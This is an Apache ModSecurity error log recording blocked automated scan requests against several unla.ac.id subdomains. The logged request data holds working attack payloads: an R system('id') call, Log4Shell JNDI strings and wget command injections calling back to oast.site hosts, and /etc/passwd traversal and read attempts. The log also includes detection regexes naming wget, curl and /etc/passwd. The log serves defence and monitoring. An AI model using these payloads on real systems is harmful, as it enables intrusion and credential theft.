[Tue Aug 29 11:34:29.413402 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ){   found within ARGS:what: function(x){  return(system(paste('id'), intern = T))}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ocpu/library/base/R/do.call/json"] [unique_id "ZO11VcCo-f0AAAUNajQAAABF"]
[Tue Aug 29 11:34:29.416191 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ){   found within ARGS:what: function(x){  return(system(paste('id'), intern = T))}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ocpu/library/base/R/do.call/json"] [unique_id "ZO11VcCo-f0AAATavtkAAAAg"]
[Tue Aug 29 11:34:29.438791 2023] [:error] [pid 1234] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ){   found within ARGS:what: function(x){  return(system(paste('id'), intern = T))}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ocpu/library/base/R/do.call/json"] [unique_id "ZO11VcCo-f0AAATSkmgAAAAT"]
[Tue Aug 29 11:34:29.508946 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ){   found within ARGS:what: function(x){  return(system(paste('id'), intern = T))}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ocpu/library/base/R/do.call/json"] [unique_id "ZO11VcCo-f0AAATUxPoAAAAW"]
[Tue Aug 29 11:34:29.508950 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:a: ${jndi:ldap://${:-334}${:-600}.${hostName}.search.cjmn8l5jmimk2adbbnlgqk9rm8hyaxnhi.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/_search"] [unique_id "ZO11VcCo-f0AAATPtQQAAAAM"]
[Tue Aug 29 11:34:29.509572 2023] [:error] [pid 1228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:a: ${jndi:ldap://${:-334}${:-600}.${hostName}.search.cjmn8l5jmimk2adbbnlgo55q6fekdqekx.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/_search"] [unique_id "ZO11VcCo-f0AAATMStYAAAAB"]
[Tue Aug 29 11:34:29.788522 2023] [:error] [pid 1310] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "www.unla.ac.id"] [uri "/_async/AsyncResponseService"] [unique_id "ZO11VcCo-f0AAAUeP7sAAABT"]
[Tue Aug 29 11:34:30.320880 2023] [:error] [pid 1234] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-467}${:-284}.${hostName}.username.cjmn8l5jmimk2adbbnlgqej5ars79qb85.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11VsCo-f0AAATSkmkAAAAT"]
[Tue Aug 29 11:34:30.323421 2023] [:error] [pid 1310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:target_addr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:target_addr: \\x221.1.1.1 `wget http:/cjmn8l5jmimk2adbbnlgdek7mx8ifejjh.oast.site/`\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/boaform/admin/formTracert"] [unique_id "ZO11VsCo-f0AAAUeP7wAAABT"]
[Tue Aug 29 11:34:30.325639 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:target_addr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:target_addr: \\x221.1.1.1 `wget http:/cjmn8l5jmimk2adbbnlg3wx6th54zs5gr.oast.site/`\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/boaform/admin/formTracert"] [unique_id "ZO11VsCo-f0AAASEJWQAAAAE"]
[Tue Aug 29 11:34:30.339822 2023] [:error] [pid 1288] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:target_addr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:target_addr: \\x221.1.1.1 `wget http:/cjmn8l5jmimk2adbbnlghcco3qewhemqz.oast.site/`\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/boaform/admin/formTracert"] [unique_id "ZO11VsCo-f0AAAUIz6YAAABA"]
[Tue Aug 29 11:34:30.355272 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ){   found within ARGS:what: function(x){  return(system(paste('id'), intern = T))}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ocpu/library/base/R/do.call/json"] [unique_id "ZO11VsCo-f0AAATUxPsAAAAW"]
[Tue Aug 29 11:34:30.371052 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:../../../../etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:../../../../etc/passwd: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/blast/nph-viewgif.cgi"] [unique_id "ZO11VsCo-f0AAATPtQUAAAAM"]
[Tue Aug 29 11:34:30.388689 2023] [:error] [pid 1229] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:target_addr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:target_addr: \\x221.1.1.1 `wget http:/cjmn8l5jmimk2adbbnlgojxcxirguuyqc.oast.site/`\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/boaform/admin/formTracert"] [unique_id "ZO11VsCo-f0AAATNJYkAAAAF"]
[Tue Aug 29 11:34:30.403713 2023] [:error] [pid 1254] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:target_addr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:target_addr: \\x221.1.1.1 `wget http:/cjmn8l5jmimk2adbbnlgfwu5oxgco7yc4.oast.site/`\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/boaform/admin/formTracert"] [unique_id "ZO11VsCo-f0AAATmZcQAAAAr"]
[Tue Aug 29 11:34:30.410408 2023] [:error] [pid 1235] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:a: ${jndi:ldap://${:-334}${:-600}.${hostName}.search.cjmn8l5jmimk2adbbnlg3domf9tux3zkh.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/_search"] [unique_id "ZO11VsCo-f0AAATTmRAAAAAV"]
[Tue Aug 29 11:34:30.412254 2023] [:error] [pid 1237] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:a: ${jndi:ldap://${:-334}${:-600}.${hostName}.search.cjmn8l5jmimk2adbbnlg4bqap1dtsk553.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/_search"] [unique_id "ZO11VsCo-f0AAATVtRgAAAAZ"]
[Tue Aug 29 11:34:30.419903 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:a: ${jndi:ldap://${:-334}${:-600}.${hostName}.search.cjmn8l5jmimk2adbbnlgymu5c79uec86h.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/_search"] [unique_id "ZO11VsCo-f0AAATQXgMAAAAO"]
[Tue Aug 29 11:34:30.439570 2023] [:error] [pid 1228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:target_addr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:target_addr: \\x221.1.1.1 `wget http:/cjmn8l5jmimk2adbbnlgcnt5hwny31ak1.oast.site/`\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/boaform/admin/formTracert"] [unique_id "ZO11VsCo-f0AAATMStcAAAAB"]
[Tue Aug 29 11:34:30.452487 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:a: ${jndi:ldap://${:-334}${:-600}.${hostName}.search.cjmn8l5jmimk2adbbnlg6ss46dg3n98t5.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/_search"] [unique_id "ZO11VsCo-f0AAAT9POAAAAA1"]
[Tue Aug 29 11:34:31.425446 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:subWidgets[0][config][code]: echo md5(\\x22CVE-2019-16759\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO11V8Co-f0AAAUR824AAABI"]
[Tue Aug 29 11:34:31.426947 2023] [:error] [pid 1240] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:subWidgets[0][config][code]: echo md5(\\x22CVE-2019-16759\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO11V8Co-f0AAATYeDEAAAAd"]
[Tue Aug 29 11:34:31.431203 2023] [:error] [pid 1250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:subWidgets[0][config][code]: echo md5(\\x22CVE-2019-16759\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO11V8Co-f0AAATiz@YAAAAn"]
[Tue Aug 29 11:34:31.431970 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:subWidgets[0][config][code]: echo md5(\\x22CVE-2019-16759\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO11V8Co-f0AAATQXgUAAAAO"]
[Tue Aug 29 11:34:31.434483 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:subWidgets[0][config][code]: echo md5(\\x22CVE-2019-16759\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO11V8Co-f0AAAQKOu8AAAAs"]
[Tue Aug 29 11:34:32.322125 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:query: echo md5(\\x22CVE-2020-19625\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/tests/support/stores/test_grid_filter.php"] [unique_id "ZO11WMCo-f0AAAUNajcAAABF"]
[Tue Aug 29 11:34:32.324985 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:query: echo md5(\\x22CVE-2020-19625\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/tests/support/stores/test_grid_filter.php"] [unique_id "ZO11WMCo-f0AAAT9POEAAAA1"]
[Tue Aug 29 11:34:32.329364 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ReaderNo: `cat/etc/passwd > eekovulpxo.txt`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11WMCo-f0AAAUQ7rAAAABH"]
[Tue Aug 29 11:34:32.332713 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ReaderNo: `cat/etc/passwd > eekovulpxo.txt`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11WMCo-f0AAASEJWYAAAAE"]
[Tue Aug 29 11:34:32.334673 2023] [:error] [pid 1228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ReaderNo: `cat/etc/passwd > eekovulpxo.txt`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11WMCo-f0AAATMStkAAAAB"]
[Tue Aug 29 11:34:32.336718 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:subWidgets[0][config][code]: echo md5(\\x22CVE-2019-16759\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO11WMCo-f0AAAUFdeYAAAA9"]
[Tue Aug 29 11:34:32.339588 2023] [:error] [pid 1256] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ReaderNo: `cat/etc/passwd > eekovulpxo.txt`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11WMCo-f0AAATovmMAAAAt"]
